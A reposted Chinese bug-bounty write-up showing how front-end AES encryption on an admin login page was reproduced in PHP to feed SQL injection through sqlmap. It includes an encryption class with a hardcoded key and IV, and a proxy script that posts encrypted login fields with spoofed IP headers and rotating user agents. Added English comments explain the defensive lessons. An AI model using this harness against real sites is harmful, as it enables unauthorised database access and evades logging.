实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入


文章来源:转载来源语雀文档,非P喵呜作者本人投稿

如有侵权,请联系删除

0x01 概要
站点:http://aa.test.com/Admin/Login
实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入

这样看起来是一个挺正常的界面,测试一下发现存在注入

实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入

实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入

很清楚的可以看到两张图片是有明显的区别的,说明有注入

抓包时发现!!!!
实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入


0x02 查看前端加密方式


前端加密的话,那就只需要找到对应前端加密脚本即可
实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入

实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入

实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入

实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入


0x03 编码对应解密脚本


实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入

# AES 加解密脚本
<?php
/**
* AES/CBC/PKCS5Padding 模式 加密解密
*/

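class Crypt
{
    /**
     * AES/CBC with PKCS#5 (PKCS#7) padding; ciphertext is returned as lower-case hex.
     *
     * Ported from the mcrypt extension (removed from core in PHP 7.2; the original
     * also used the `$text{...}` offset syntax removed in PHP 8.0) to ext/openssl.
     * mcrypt's MCRYPT_RIJNDAEL_128 with a 16/24/32-byte key is exactly
     * AES-128/192/256-CBC, so output stays byte-for-byte compatible with the
     * original implementation.
     *
     * Defender's note: a key and IV that ship in client-side script, as this
     * article reconstructs, are visible to every client, so this "encryption" is
     * not confidentiality and the server must still treat the decrypted value as
     * untrusted input. CBC here is also unauthenticated (no MAC): a server that
     * reports a padding failure differently from any other decryption failure
     * exposes a padding oracle.
     */

    /** AES block size in bytes (what mcrypt_get_block_size() returned for Rijndael-128). */
    private const BLOCK_SIZE = 16;

    /** Key length in bytes => openssl cipher name. mcrypt accepted exactly these sizes. */
    private const CIPHER_BY_KEY_LENGTH = [
        16 => 'aes-128-cbc',
        24 => 'aes-192-cbc',
        32 => 'aes-256-cbc',
    ];

    /**
     * Cipher / mode names (the string values of MCRYPT_RIJNDAEL_128 / MCRYPT_MODE_CBC).
     * Kept only for interface compatibility: as in the original, encrypt() and
     * decrypt() always use AES-CBC regardless of these two values.
     *
     * @var string
     */
    private $cipher = 'rijndael-128';
    /** @var string */
    private $mode = 'cbc';

    /**
     * Secret key; must be 16, 24 or 32 bytes (checked on use).
     *
     * @var string
     */
    private $secret_key = '123456789ABCDEFG123456789ABCDEFG';

    /**
     * Initialisation vector; must be exactly BLOCK_SIZE bytes (checked on use).
     *
     * @var string
     */
    private $iv = '123456789ABCDEFG';

    /** Replaces the cipher name; an empty string leaves the current value unchanged. */
    public function setCipher(string $cipher = ''): void
    {
        if ($cipher !== '') {
            $this->cipher = $cipher;
        }
    }

    /** Replaces the mode name; an empty string leaves the current value unchanged. */
    public function setMode(string $mode = ''): void
    {
        if ($mode !== '') {
            $this->mode = $mode;
        }
    }

    /** Replaces the key; an empty string leaves the current value unchanged. */
    public function setSecretKey(string $secret_key = ''): void
    {
        if ($secret_key !== '') {
            $this->secret_key = $secret_key;
        }
    }

    /** Replaces the IV; an empty string leaves the current value unchanged. */
    public function setIv(string $iv = ''): void
    {
        if ($iv !== '') {
            $this->iv = $iv;
        }
    }

    /**
     * Encrypts $str and returns the ciphertext as lower-case hex.
     *
     * @throws \InvalidArgumentException when the key or IV has an unsupported length
     * @throws \RuntimeException when openssl reports a failure
     */
    public function encrypt(string $str): string
    {
        $padded = $this->pkcs5Pad($str, self::BLOCK_SIZE);
        // OPENSSL_ZERO_PADDING turns off openssl's own PKCS#7 padding: the input
        // is already padded above, exactly as the mcrypt version did.
        $raw = openssl_encrypt(
            $padded,
            $this->cipherName(),
            $this->secret_key,
            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
            $this->iv
        );
        if ($raw === false) {
            $reason = openssl_error_string();
            throw new \RuntimeException('AES encryption failed: ' . ($reason === false ? 'unknown error' : $reason));
        }
        return strtolower(bin2hex($raw));
    }

    /**
     * Decrypts a hex ciphertext produced by encrypt().
     *
     * Returns false (as the original did on bad padding) when the input is not
     * well-formed hex, is not a whole number of blocks, or unpads incorrectly.
     *
     * @return string|false
     * @throws \InvalidArgumentException when the key or IV has an unsupported length
     */
    public function decrypt(string $str)
    {
        $raw = $this->hex2bin(strtolower($str));
        if ($raw === false || strlen($raw) % self::BLOCK_SIZE !== 0) {
            return false;
        }
        $padded = openssl_decrypt(
            $raw,
            $this->cipherName(),
            $this->secret_key,
            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
            $this->iv
        );
        if ($padded === false) {
            return false;
        }
        return $this->pkcs5Unpad($padded);
    }

    /**
     * Selects the AES variant from the key length and validates the IV length.
     * The rejected sizes are the ones mcrypt itself rejected.
     *
     * @throws \InvalidArgumentException
     */
    private function cipherName(): string
    {
        $keyLength = strlen($this->secret_key);
        $cipher = self::CIPHER_BY_KEY_LENGTH[$keyLength] ?? null;
        if ($cipher === null) {
            throw new \InvalidArgumentException("key must be 16, 24 or 32 bytes, got {$keyLength}");
        }
        if (strlen($this->iv) !== self::BLOCK_SIZE) {
            throw new \InvalidArgumentException('iv must be exactly ' . self::BLOCK_SIZE . ' bytes');
        }
        return $cipher;
    }

    /**
     * Inverse of bin2hex(). Unlike the original loop (which silently skipped
     * non-hex characters and odd trailing nibbles), malformed input yields false.
     *
     * @return string|false
     */
    private function hex2bin(string $hexData)
    {
        if ($hexData === '' || strlen($hexData) % 2 !== 0 || preg_match('/^[0-9a-fA-F]+$/D', $hexData) !== 1) {
            return false;
        }
        return \hex2bin($hexData);
    }

    /** PKCS#5/#7 padding: appends N bytes of value N, 1 <= N <= $blocksize. */
    private function pkcs5Pad(string $text, int $blocksize): string
    {
        $pad = $blocksize - (strlen($text) % $blocksize);
        return $text . str_repeat(chr($pad), $pad);
    }

    /**
     * Strips PKCS#5/#7 padding; returns false when the padding is invalid.
     * A pad byte of 0 is rejected too (the original accepted it and returned '').
     *
     * @return string|false
     */
    private function pkcs5Unpad(string $text)
    {
        $length = strlen($text);
        if ($length === 0) {
            return false;
        }
        $pad = ord($text[$length - 1]);
        if ($pad < 1 || $pad > self::BLOCK_SIZE || $pad > $length) {
            return false;
        }
        if (strspn($text, chr($pad), $length - $pad) !== $pad) {
            return false;
        }
        return substr($text, 0, $length - $pad);
    }
}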
// Sample run: prints the hex ciphertext of '111' under the class defaults,
// for comparison against what the site's front-end script produces.
print((new Crypt())->encrypt('111'));

实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入

可以看得到一致的,那就可以正常注入了

# 注入脚本
<?php
/**
* AES/CBC/PKCS5Padding 模式 加密解密
*/

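class Crypt
{
    /**
     * AES/CBC with PKCS#5 (PKCS#7) padding; ciphertext is returned as lower-case hex.
     *
     * Ported from the mcrypt extension (removed from core in PHP 7.2; the original
     * also used the `$text{...}` offset syntax removed in PHP 8.0) to ext/openssl.
     * mcrypt's MCRYPT_RIJNDAEL_128 with a 16/24/32-byte key is exactly
     * AES-128/192/256-CBC, so output stays byte-for-byte compatible with the
     * original implementation.
     *
     * Defender's note: a key and IV that ship in client-side script, as this
     * article reconstructs, are visible to every client, so this "encryption" is
     * not confidentiality and the server must still treat the decrypted value as
     * untrusted input. CBC here is also unauthenticated (no MAC): a server that
     * reports a padding failure differently from any other decryption failure
     * exposes a padding oracle.
     */

    /** AES block size in bytes (what mcrypt_get_block_size() returned for Rijndael-128). */
    private const BLOCK_SIZE = 16;

    /** Key length in bytes => openssl cipher name. mcrypt accepted exactly these sizes. */
    private const CIPHER_BY_KEY_LENGTH = [
        16 => 'aes-128-cbc',
        24 => 'aes-192-cbc',
        32 => 'aes-256-cbc',
    ];

    /**
     * Cipher / mode names (the string values of MCRYPT_RIJNDAEL_128 / MCRYPT_MODE_CBC).
     * Kept only for interface compatibility: as in the original, encrypt() and
     * decrypt() always use AES-CBC regardless of these two values.
     *
     * @var string
     */
    private $cipher = 'rijndael-128';
    /** @var string */
    private $mode = 'cbc';

    /**
     * Secret key; must be 16, 24 or 32 bytes (checked on use).
     *
     * @var string
     */
    private $secret_key = '123456789ABCDEFG123456789ABCDEFG';

    /**
     * Initialisation vector; must be exactly BLOCK_SIZE bytes (checked on use).
     *
     * @var string
     */
    private $iv = '123456789ABCDEFG';

    /** Replaces the cipher name; an empty string leaves the current value unchanged. */
    public function setCipher(string $cipher = ''): void
    {
        if ($cipher !== '') {
            $this->cipher = $cipher;
        }
    }

    /** Replaces the mode name; an empty string leaves the current value unchanged. */
    public function setMode(string $mode = ''): void
    {
        if ($mode !== '') {
            $this->mode = $mode;
        }
    }

    /** Replaces the key; an empty string leaves the current value unchanged. */
    public function setSecretKey(string $secret_key = ''): void
    {
        if ($secret_key !== '') {
            $this->secret_key = $secret_key;
        }
    }

    /** Replaces the IV; an empty string leaves the current value unchanged. */
    public function setIv(string $iv = ''): void
    {
        if ($iv !== '') {
            $this->iv = $iv;
        }
    }

    /**
     * Encrypts $str and returns the ciphertext as lower-case hex.
     *
     * @throws \InvalidArgumentException when the key or IV has an unsupported length
     * @throws \RuntimeException when openssl reports a failure
     */
    public function encrypt(string $str): string
    {
        $padded = $this->pkcs5Pad($str, self::BLOCK_SIZE);
        // OPENSSL_ZERO_PADDING turns off openssl's own PKCS#7 padding: the input
        // is already padded above, exactly as the mcrypt version did.
        $raw = openssl_encrypt(
            $padded,
            $this->cipherName(),
            $this->secret_key,
            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
            $this->iv
        );
        if ($raw === false) {
            $reason = openssl_error_string();
            throw new \RuntimeException('AES encryption failed: ' . ($reason === false ? 'unknown error' : $reason));
        }
        return strtolower(bin2hex($raw));
    }

    /**
     * Decrypts a hex ciphertext produced by encrypt().
     *
     * Returns false (as the original did on bad padding) when the input is not
     * well-formed hex, is not a whole number of blocks, or unpads incorrectly.
     *
     * @return string|false
     * @throws \InvalidArgumentException when the key or IV has an unsupported length
     */
    public function decrypt(string $str)
    {
        $raw = $this->hex2bin(strtolower($str));
        if ($raw === false || strlen($raw) % self::BLOCK_SIZE !== 0) {
            return false;
        }
        $padded = openssl_decrypt(
            $raw,
            $this->cipherName(),
            $this->secret_key,
            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
            $this->iv
        );
        if ($padded === false) {
            return false;
        }
        return $this->pkcs5Unpad($padded);
    }

    /**
     * Selects the AES variant from the key length and validates the IV length.
     * The rejected sizes are the ones mcrypt itself rejected.
     *
     * @throws \InvalidArgumentException
     */
    private function cipherName(): string
    {
        $keyLength = strlen($this->secret_key);
        $cipher = self::CIPHER_BY_KEY_LENGTH[$keyLength] ?? null;
        if ($cipher === null) {
            throw new \InvalidArgumentException("key must be 16, 24 or 32 bytes, got {$keyLength}");
        }
        if (strlen($this->iv) !== self::BLOCK_SIZE) {
            throw new \InvalidArgumentException('iv must be exactly ' . self::BLOCK_SIZE . ' bytes');
        }
        return $cipher;
    }

    /**
     * Inverse of bin2hex(). Unlike the original loop (which silently skipped
     * non-hex characters and odd trailing nibbles), malformed input yields false.
     *
     * @return string|false
     */
    private function hex2bin(string $hexData)
    {
        if ($hexData === '' || strlen($hexData) % 2 !== 0 || preg_match('/^[0-9a-fA-F]+$/D', $hexData) !== 1) {
            return false;
        }
        return \hex2bin($hexData);
    }

    /** PKCS#5/#7 padding: appends N bytes of value N, 1 <= N <= $blocksize. */
    private function pkcs5Pad(string $text, int $blocksize): string
    {
        $pad = $blocksize - (strlen($text) % $blocksize);
        return $text . str_repeat(chr($pad), $pad);
    }

    /**
     * Strips PKCS#5/#7 padding; returns false when the padding is invalid.
     * A pad byte of 0 is rejected too (the original accepted it and returned '').
     *
     * @return string|false
     */
    private function pkcs5Unpad(string $text)
    {
        $length = strlen($text);
        if ($length === 0) {
            return false;
        }
        $pad = ord($text[$length - 1]);
        if ($pad < 1 || $pad > self::BLOCK_SIZE || $pad > $length) {
            return false;
        }
        if (strspn($text, chr($pad), $length - $pad) !== $pad) {
            return false;
        }
        return substr($text, 0, $length - $pad);
    }
}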
class SqlCurl
{
/**
 * Thin ext/curl wrapper used by the harness at the bottom of the script.
 *
 * Sends one request to $url: a POST with $post URL-encoded as the body when
 * $post is non-empty, otherwise a GET. A non-empty $cookie is sent verbatim as
 * the Cookie header; an empty $referurl is replaced by 'https://www.baidu.com'.
 * Redirects are followed (CURLOPT_FOLLOWLOCATION) and the transfer times out
 * after 10 seconds.
 *
 * Returns the response body on success, but the curl error *message* (also a
 * string) when the transfer fails — a caller cannot tell the two apart by type.
 *
 * Defender's note: every IP-looking header set below is chosen by the client,
 * so a server must not use Client-IP / X-Forwarded-For and similar headers for
 * access control, rate limiting or audit logging unless a trusted proxy
 * overwrites them. Because each getIp() call below returns a different random
 * address, these headers do not even agree with one another — a request whose
 * forwarded-for headers are mutually inconsistent is itself a useful anomaly
 * signal in logs.
 */
public function curlRequest($url, $post = [], $cookie = '', $referurl = '')
{
if (!$referurl) {
$referurl = 'https://www.baidu.com';
}

// Client-supplied IP headers, each filled with a fresh random address.
$header = array(
'CLIENT-IP:' . $this->getIp(),
'X-FORWARDED-FOR:' . $this->getIp(),
'HTTP_CLIENT_IP:' .$this->getIp(),
// NOTE(review): the ':' is missing here, so this entry is not a well-formed
// "name: value" header line.
'HTTP_X_FORWARDED_FOR' . $this->getIp(),
'REMOTE_ADDR:' . $this->getIp(),
'Content-Type:application/x-www-form-urlencoded',
'X-Requested-With:XMLHttpRequest',
);

$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
// Random browser User-Agent, picked per request from agentArry().
curl_setopt($curl, CURLOPT_USERAGENT, $this->agentArry());
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
curl_setopt($curl, CURLOPT_REFERER, $referurl);
curl_setopt($curl, CURLOPT_HTTPHEADER, $header);

if ($post) {
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
}

if ($cookie) {
curl_setopt($curl, CURLOPT_COOKIE, $cookie);
}

curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($curl);

if (curl_errno($curl)) {
// NOTE(review): returns without curl_close(); the handle is leaked on this path.
return curl_error($curl);
}

curl_close($curl);
return $data;
}

/**
 * Random dotted-quad (first octet 11..191, others bounded as shown) used only
 * to fill the client-supplied IP headers in curlRequest(). mt_rand() is fine
 * here since nothing security-relevant depends on the value.
 */
private function getIp()
{
return mt_rand(11, 191) . "." . mt_rand(0, 240) . "." . mt_rand(1, 240) . "." . mt_rand(1, 240);
}
/**
 * Returns one User-Agent string chosen uniformly at random from the table.
 * The array keys are human-readable labels only and are never sent.
 */
private function agentArry()
{
$agentarry = [
// Desktop user agents
"safari 5.1 – MAC" => "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
"safari 5.1 – Windows" => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
"Firefox 38esr" => "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
"IE 11" => "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko",
"IE 9.0" => "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0",
"IE 8.0" => "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
"IE 7.0" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
"IE 6.0" => "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Firefox 4.0.1 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Firefox 4.0.1 – Windows" => "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Opera 11.11 – MAC" => "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11",
"Opera 11.11 – Windows" => "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
"Chrome 17.0 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"傲游(Maxthon)" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)",
"腾讯 TT" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)",
"世界之窗(The World) 2.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
"世界之窗(The World) 3.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)",
"360 浏览器" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)",
"搜狗浏览器 1.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)",
"Avant" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)",
"Green Browser" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
// Mobile user agents
"safari iOS 4.33 – iPhone" => "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
"safari iOS 4.33 – iPod Touch" => "Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
"safari iOS 4.33 – iPad" => "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
"Android N1" => "Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Android QQ 浏览器 For android" => "MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Android Opera Mobile" => "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10",
"Android Pad Moto Xoom" => "Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"BlackBerry" => "Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+",
"WebOS HP Touchpad" => "Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0",
"UC 标准" => "NOKIA5700/ UCWEB7.0.2.37/28/999",
"UCOpenwave" => "Openwave/ UCWEB7.0.2.37/28/999",
"UC Opera" => "Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999",
"微信内置浏览器" => "Mozilla/5.0 (Linux; Android 6.0; 1503-M02 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile MQQBrowser/6.2 TBS/036558 Safari/537.36 MicroMessenger/6.3.25.861 NetType/WIFI Language/zh_CN",
];
return $agentarry[array_rand($agentarry, 1)];
}
}
// http://aa.test.com:8088/Admin/Login?tdsourcetag=s_pctim_aiomsg#
// Script entry point: reads UserName / Password from the query string (no
// validation; an undefined-index notice if either is absent), encrypts each
// value the way the site's front-end does, and POSTs them to the login endpoint,
// echoing the raw response. Defender's takeaway: the server decrypts these
// fields before using them, so client-side encryption is not input validation
// and the injection point behind it is unchanged — only parameterised queries
// on the server side close it.
$data['UserName'] = (new Crypt())->encrypt($_GET['UserName']);
$data['Password'] = (new Crypt())->encrypt($_GET['Password']);
echo (new SqlCurl())->curlRequest('http://aa.test.com:8088/Admin/Login_Submit', $data);


0x04 Sqlmap 正常注入


实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入

实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入

实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入




原文始发于微信公众号(HACK学习君):实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入

  • 本文由 发表于 2023年2月14日10:48:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入https://cn-sec.com/archives/1553166.html
